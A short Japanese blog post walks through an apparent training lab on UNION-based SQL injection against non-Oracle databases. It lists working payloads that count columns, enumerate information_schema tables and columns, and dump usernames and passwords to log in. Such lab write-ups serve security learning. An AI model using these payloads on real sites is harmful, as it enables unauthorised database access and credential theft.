Shikata Ga Nai

Private? There is no such things.

SQL injection attack, listing the database contents on non-Oracle databasesをやってみた

Hello there, ('ω')ノ

 

SQLインジェクション攻撃、Oracle以外のデータベースコンテンツを一覧表示を。

まずは、Petsをクリックして。

 

f:id:ThisIsOne:20210310205320p:plain

 

リクエストをリピータへ。

 

f:id:ThisIsOne:20210310205408p:plain

 

はじめにカラム数のチェックから。

 xxx'+UNION+SELECT+NULL--

 

f:id:ThisIsOne:20210310205904p:plain

 

どうやら2つのカラムのようで。

 xxx'+UNION+SELECT+NULL,NULL--

 

f:id:ThisIsOne:20210310205833p:plain

 

そして、どちらのカラムもテキストデータのようで。

レスポンスにも表示されて。

 xxx'+UNION+SELECT+'abc','xyz'--

 

f:id:ThisIsOne:20210310210147p:plain

 

次にDB内のテーブルを表示して。

ユーザの資格情報らしきテーブルを探して。

 xxx'+UNION+SELECT+table_name,+NULL+FROM+information_schema.tables--

 

f:id:ThisIsOne:20210310211003p:plain

 

下記のペイロードで、カラム名を表示させて。

 xxx'+UNION+SELECT+column_name,+NULL+FROM+information_schema.columns+WHERE+table_name='users_xtnwpb'--

 

f:id:ThisIsOne:20210310211145p:plain

 

最後にユーザ名とパスワードをみつけて。

 xxx'+UNION+SELECT+username_fsmhio,+password_tscvvc+FROM+users_xtnwpb--

 

f:id:ThisIsOne:20210310211746p:plain

 

取得したデータでログインして。

 

f:id:ThisIsOne:20210310211910p:plain

 

クリアできた。

 

f:id:ThisIsOne:20210310211930p:plain

 

Best regards, (^^ゞ